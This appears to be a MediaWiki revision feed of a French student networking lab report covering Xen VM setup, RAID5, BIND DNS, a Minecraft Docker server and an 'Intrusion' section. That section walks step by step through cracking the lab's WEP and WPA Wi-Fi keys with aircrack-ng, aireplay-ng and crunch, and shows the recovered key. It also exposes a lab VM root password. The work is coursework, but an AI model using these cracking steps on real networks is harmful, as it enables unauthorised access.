Il nous reste plus qu'a utiliser aircrack comme ceci&lt;br /&gt;
 aircrack-ng -w password.lst wpa02.cap&lt;br /&gt;
&lt;br /&gt;
Il faut desormais être patient et attendre 5h40 pour essayer tout le dictionnaire.&lt;br /&gt;
&lt;br /&gt;
Un essaie en subdivisant a été fait mais sans resultat dans le temp imparti&lt;br /&gt;
&lt;br /&gt;
Après 4 heures 1 minutes et 29 seconde nous avons la clé: &lt;br /&gt;
 66699666&lt;br /&gt;
&lt;br /&gt;
[[Fichier:WPA_crack.png]]&lt;br /&gt;
&lt;br /&gt;
=MINECRAFT=&lt;br /&gt;
&lt;br /&gt;
Nous allons installer un serveur minecraft sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour cela nous allons avoir besoin de DOCKER&lt;br /&gt;
 apt-get install docker&lt;br /&gt;
&lt;br /&gt;
Une fois l'installation faite nous devons prendre une image de serveur minecraft:&lt;br /&gt;
 docker run -d -it -p 25565:25565 -e EULA=TRUE itzg/minecraft-server&lt;br /&gt;
&lt;br /&gt;
Cette image vient du github: https://github.com/itzg/docker-minecraft-server&lt;br /&gt;
&lt;br /&gt;
Nous mettons le port 25565 car c'est le port utilisé par minecraft&lt;br /&gt;
&lt;br /&gt;
Une fois cela fait nous pouvons visualiser les docker activité&lt;br /&gt;
 docker ps &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:docker_minecraft.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Connexion==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter il suffit d'avoir un minecraft et de renseigner l'IP du serveur&lt;br /&gt;
&lt;br /&gt;
[[Fichier:minecraft_pc.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le problème avec ce serveur minecraft est sa gourmandise en memoire. En effet, celui-ci plante lorsqu'il y a trop de redstone sur le serveur ou qu'il y a une trop grosse explosion de TNT.&lt;br /&gt;
&lt;br /&gt;
Cela doit être dû (pour la TNT) a un trop gros changement de map et besoin d'affichage qui nécessite trop de mémoire vive.&lt;br /&gt;
&lt;br /&gt;
Pour la redstone, étant donné que nous avons essayé de recréer des portes logique, cela devait trop &amp;quot;consommer&amp;quot;&lt;/div&gt;</summary>
		<author><name>Amace</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60255</id>
		<title>TP sysres SE2a5 2022/2023 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60255"/>
				<updated>2022-11-28T23:11:45Z</updated>
		
		<summary type="html">&lt;p&gt;Amace : /* Sécurisation des données - RAID5 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;br /&gt;
== Cahier de suivi - Groupe 1 ==&lt;br /&gt;
= Sommaire =&lt;br /&gt;
&lt;br /&gt;
* [[#plan-dadressage|Plan d’adressage]]&lt;br /&gt;
* [[#machine-virtuelle|Machine Virtuelle]]&lt;br /&gt;
* [[#Intrusion|Intrusion]]&lt;br /&gt;
&lt;br /&gt;
= Plan d’adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV  routée !! Nom de domaine !&lt;br /&gt;
|-&lt;br /&gt;
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Machine Virtuelle =&lt;br /&gt;
&lt;br /&gt;
== Création de la VM ==&lt;br /&gt;
&lt;br /&gt;
Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va &amp;quot;heberger&amp;quot; notre VM xen&lt;br /&gt;
 ssh root@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
On crée ensuite notre vm avec :&lt;br /&gt;
 xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :&lt;br /&gt;
 vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]&lt;br /&gt;
&lt;br /&gt;
On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :&lt;br /&gt;
 lvcreate -L10G -n HG-home storage&lt;br /&gt;
 lvcreate -L10G -n HG-var storage&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
              ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour demarrer notre VM nous utilisons :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
&lt;br /&gt;
Le -c sert a se connecter directement &lt;br /&gt;
&lt;br /&gt;
Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults	0 2&lt;br /&gt;
 /dev/xvda4 /var  ext4 defaults	0 2&lt;br /&gt;
&lt;br /&gt;
On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:&lt;br /&gt;
 mkfs.ext4 /dev/xdva3&lt;br /&gt;
&lt;br /&gt;
==Sécurisation des données - RAID5==&lt;br /&gt;
&lt;br /&gt;
On sécurise nos données à l'aide de RAID5&lt;br /&gt;
&lt;br /&gt;
Installer les paquets nécessaires sur la VM et capbreton :&lt;br /&gt;
 apt install mdadm&lt;br /&gt;
&lt;br /&gt;
Créer les partitions virtuelles pour le RAID :&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-1 virtual&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-2 virtual&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-3 virtual&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-1,xvdd1,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-2,xvdd2,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-3,xvdd3,w'&lt;br /&gt;
                ]&lt;br /&gt;
On redémarre la VM :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
Créer le RAID5 à l’aide de la commande mdadm :&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdd1 /dev/xvdd2 /dev/xvdd3&lt;br /&gt;
Formater la partition RAID5 :&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
Ajout de la partition au fichier /etc/fstab :&lt;br /&gt;
 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
On recharge les partitions afin de prendre en compte le RAID :&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
[[Fichier:RAID5.png]]&lt;br /&gt;
&lt;br /&gt;
== Serveur DNS ==&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, on utilise le registrar [[gandi.net|Gandi]] afin de réserver le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt;.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une fois le nom de domaine réservé, il est alors possible de configurer les serveurs de noms et les Glue Records :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter le Glue Record vers &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt; afin d’associer le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; à l’adresse IP &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier les serveurs de noms pour utiliser &amp;lt;code&amp;gt;ns.detestable.site&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ns6.gandi.net&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
En attendant que les serveurs de noms soient correctement modifiés, il est possible de changer les enregistrements DNS :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;@&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter l’enrgistrement DNS &amp;lt;code&amp;gt;ns&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;www&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;CNAME&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;ns.detestable.site.&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Installation du paquet &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install bind9&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 127.0.0.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;amp;quot;detestable.site&amp;amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;amp;quot;/etc/bind/db.detestable.site&amp;amp;quot;;&lt;br /&gt;
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.options&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;options{&lt;br /&gt;
  directory &amp;amp;quot;/var/cache/bind&amp;amp;quot;;&lt;br /&gt;
  forwarders {&lt;br /&gt;
    8.8.8.8;&lt;br /&gt;
    4.4.2.2;&lt;br /&gt;
  };&lt;br /&gt;
  dnssec-validation auto;&lt;br /&gt;
  listen-on-v6 { any; };&lt;br /&gt;
  allow-transfer { &amp;amp;quot;allowed_to_transfer&amp;amp;quot;; };&lt;br /&gt;
};&lt;br /&gt;
acl &amp;amp;quot;allowed_to_transfer&amp;amp;quot; {&lt;br /&gt;
  217.70.177.40/32;&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Créer le fichier BIND pour &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;cp /etc/bind/db.local /etc/bind/db.detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/db.detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for detestable.site&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.detestable.site. root.detestable.site. (&lt;br /&gt;
                              3         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@   IN  NS  ns.detestable.site.&lt;br /&gt;
@   IN  NS  ns6.gandi.net.&lt;br /&gt;
@   IN  A   193.48.57.163&lt;br /&gt;
NS  IN  A   193.48.57.163&lt;br /&gt;
NS  IN  AAAA    2001:660:4401:60a0:216:3eff:fe82:3e78&lt;br /&gt;
WWW IN  CNAME   NS&lt;br /&gt;
SSH IN  CNAME   NS&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Redémarrage du service &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 restart&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Tester DNS : ===&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 193.48.57.163&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Vérification de la traduction du nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nslookup detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Intrusion =&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WEP ==&lt;br /&gt;
&lt;br /&gt;
Pour casser une clé WEP il nous faut le logiciel Aircrack:&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abord se mettre sur la bonne interface ethernet:&lt;br /&gt;
 airmon-ng start wlan0mon&lt;br /&gt;
&lt;br /&gt;
On se met ensuite en écoute sur ce réseau en indiquant le cryptage (WEP)&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On recupere ensuite l'ESSID et le BSSID correspondant a notre groupe (Groupe 1)&lt;br /&gt;
&lt;br /&gt;
(Ne pas juger la qualité du photographe)&lt;br /&gt;
[[Fichier:WEP_Liste.jpg]]&lt;br /&gt;
&lt;br /&gt;
On s'identifie&lt;br /&gt;
 aireplay-ng -9 -e cracotte01 -a 04:DA:D2:9C:50:50 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous recuperons ensuite les VI que l'on stock dans un fichier qui nous permettera de casser la clé :&lt;br /&gt;
 airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous procédons maintenant a la fausse identification: &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte01 -a 04:DA:D2:9C:50:50 -h 40:A5:EF:01:21:80 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu'a lancer le crack de la clé &lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:50 output*.cap&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Resultat: &lt;br /&gt;
&lt;br /&gt;
[[Fichier:cléWEP.jpeg]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WPA ==&lt;br /&gt;
&lt;br /&gt;
Nous allons utiliser le même logiciel que pour WEP (aircrack)&lt;br /&gt;
&lt;br /&gt;
Pour recuperer la clé WPA, il faut attendre un handshake de krakote01&lt;br /&gt;
 airodump-ng wlx40a5efd2140c --essid kracotte01 -c 4 -w /tmp/wpa&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake recuperer nous allons generer un dictionvaire de mot de passe (ici une combinaison de 8 chiffres)&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Il nous reste plus qu'a utiliser aircrack comme ceci&lt;br /&gt;
 aircrack-ng -w password.lst wpa02.cap&lt;br /&gt;
&lt;br /&gt;
Il faut desormais être patient et attendre 5h40 pour essayer tout le dictionnaire.&lt;br /&gt;
&lt;br /&gt;
Un essaie en subdivisant a été fait mais sans resultat dans le temp imparti&lt;br /&gt;
&lt;br /&gt;
Après 4 heures 1 minutes et 29 seconde nous avons la clé: &lt;br /&gt;
 66699666&lt;br /&gt;
&lt;br /&gt;
[[Fichier:WPA_crack.png]]&lt;br /&gt;
&lt;br /&gt;
=MINECRAFT=&lt;br /&gt;
&lt;br /&gt;
Nous allons installer un serveur minecraft sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour cela nous allons avoir besoin de DOCKER&lt;br /&gt;
 apt-get install docker&lt;br /&gt;
&lt;br /&gt;
Une fois l'installation faite nous devons prendre une image de serveur minecraft:&lt;br /&gt;
 docker run -d -it -p 25565:25565 -e EULA=TRUE itzg/minecraft-server&lt;br /&gt;
&lt;br /&gt;
Cette image vient du github: https://github.com/itzg/docker-minecraft-server&lt;br /&gt;
&lt;br /&gt;
Nous mettons le port 25565 car c'est le port utilisé par minecraft&lt;br /&gt;
&lt;br /&gt;
Une fois cela fait nous pouvons visualiser les docker activité&lt;br /&gt;
 docker ps &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:docker_minecraft.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Connexion==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter il suffit d'avoir un minecraft et de renseigner l'IP du serveur&lt;br /&gt;
&lt;br /&gt;
[[Fichier:minecraft_pc.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le problème avec ce serveur minecraft est sa gourmandise en memoire. En effet, celui-ci plante lorsqu'il y a trop de redstone sur le serveur ou qu'il y a une trop grosse explosion de TNT.&lt;br /&gt;
&lt;br /&gt;
Cela doit être dû (pour la TNT) a un trop gros changement de map et besoin d'affichage qui nécessite trop de mémoire vive.&lt;br /&gt;
&lt;br /&gt;
Pour la redstone, étant donné que nous avons essayé de recréer des portes logique, cela devait trop &amp;quot;consommer&amp;quot;&lt;/div&gt;</summary>
		<author><name>Amace</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:RAID5.png&amp;diff=60254</id>
		<title>Fichier:RAID5.png</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:RAID5.png&amp;diff=60254"/>
				<updated>2022-11-28T23:09:37Z</updated>
		
		<summary type="html">&lt;p&gt;Amace : Amace a téléversé une nouvelle version de Fichier:RAID5.png&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Amace</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60253</id>
		<title>TP sysres SE2a5 2022/2023 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60253"/>
				<updated>2022-11-28T23:07:12Z</updated>
		
		<summary type="html">&lt;p&gt;Amace : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;br /&gt;
== Cahier de suivi - Groupe 1 ==&lt;br /&gt;
= Sommaire =&lt;br /&gt;
&lt;br /&gt;
* [[#plan-dadressage|Plan d’adressage]]&lt;br /&gt;
* [[#machine-virtuelle|Machine Virtuelle]]&lt;br /&gt;
* [[#Intrusion|Intrusion]]&lt;br /&gt;
&lt;br /&gt;
= Plan d’adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV  routée !! Nom de domaine !&lt;br /&gt;
|-&lt;br /&gt;
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Machine Virtuelle =&lt;br /&gt;
&lt;br /&gt;
== Création de la VM ==&lt;br /&gt;
&lt;br /&gt;
Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va &amp;quot;heberger&amp;quot; notre VM xen&lt;br /&gt;
 ssh root@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
On crée ensuite notre vm avec :&lt;br /&gt;
 xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :&lt;br /&gt;
 vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]&lt;br /&gt;
&lt;br /&gt;
On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :&lt;br /&gt;
 lvcreate -L10G -n HG-home storage&lt;br /&gt;
 lvcreate -L10G -n HG-var storage&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
              ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour demarrer notre VM nous utilisons :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
&lt;br /&gt;
Le -c sert a se connecter directement &lt;br /&gt;
&lt;br /&gt;
Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults	0 2&lt;br /&gt;
 /dev/xvda4 /var  ext4 defaults	0 2&lt;br /&gt;
&lt;br /&gt;
On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:&lt;br /&gt;
 mkfs.ext4 /dev/xdva3&lt;br /&gt;
&lt;br /&gt;
==Sécurisation des données - RAID5==&lt;br /&gt;
&lt;br /&gt;
On sécurise nos données à l'aide de RAID5&lt;br /&gt;
&lt;br /&gt;
Installer les paquets nécessaires sur la VM et capbreton :&lt;br /&gt;
 apt install mdadm&lt;br /&gt;
&lt;br /&gt;
Créer les partitions virtuelles pour le RAID :&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-1 virtual&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-2 virtual&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-3 virtual&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/lamentable-raid-1,xvdd1,w',&lt;br /&gt;
                  'phy:/dev/virtual/lamentable-raid-2,xvdd2,w',&lt;br /&gt;
                  'phy:/dev/virtual/lamentable-raid-3,xvdd3,w'&lt;br /&gt;
                ]&lt;br /&gt;
On redémarre la VM :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
Créer le RAID5 à l’aide de la commande mdadm :&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdd1 /dev/xvdd2 /dev/xvdd3&lt;br /&gt;
Formater la partition RAID5 :&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
Ajout de la partition au fichier /etc/fstab :&lt;br /&gt;
 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
On recharge les partitions afin de prendre en compte le RAID :&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
[[Fichier:RAID5.png]]&lt;br /&gt;
&lt;br /&gt;
== Serveur DNS ==&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, on utilise le registrar [[gandi.net|Gandi]] afin de réserver le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt;.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une fois le nom de domaine réservé, il est alors possible de configurer les serveurs de noms et les Glue Records :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter le Glue Record vers &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt; afin d’associer le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; à l’adresse IP &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier les serveurs de noms pour utiliser &amp;lt;code&amp;gt;ns.detestable.site&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ns6.gandi.net&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
En attendant que les serveurs de noms soient correctement modifiés, il est possible de changer les enregistrements DNS :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;@&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter l’enrgistrement DNS &amp;lt;code&amp;gt;ns&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;www&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;CNAME&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;ns.detestable.site.&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Installation du paquet &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install bind9&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 127.0.0.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;amp;quot;detestable.site&amp;amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;amp;quot;/etc/bind/db.detestable.site&amp;amp;quot;;&lt;br /&gt;
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.options&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;options{&lt;br /&gt;
  directory &amp;amp;quot;/var/cache/bind&amp;amp;quot;;&lt;br /&gt;
  forwarders {&lt;br /&gt;
    8.8.8.8;&lt;br /&gt;
    4.4.2.2;&lt;br /&gt;
  };&lt;br /&gt;
  dnssec-validation auto;&lt;br /&gt;
  listen-on-v6 { any; };&lt;br /&gt;
  allow-transfer { &amp;amp;quot;allowed_to_transfer&amp;amp;quot;; };&lt;br /&gt;
};&lt;br /&gt;
acl &amp;amp;quot;allowed_to_transfer&amp;amp;quot; {&lt;br /&gt;
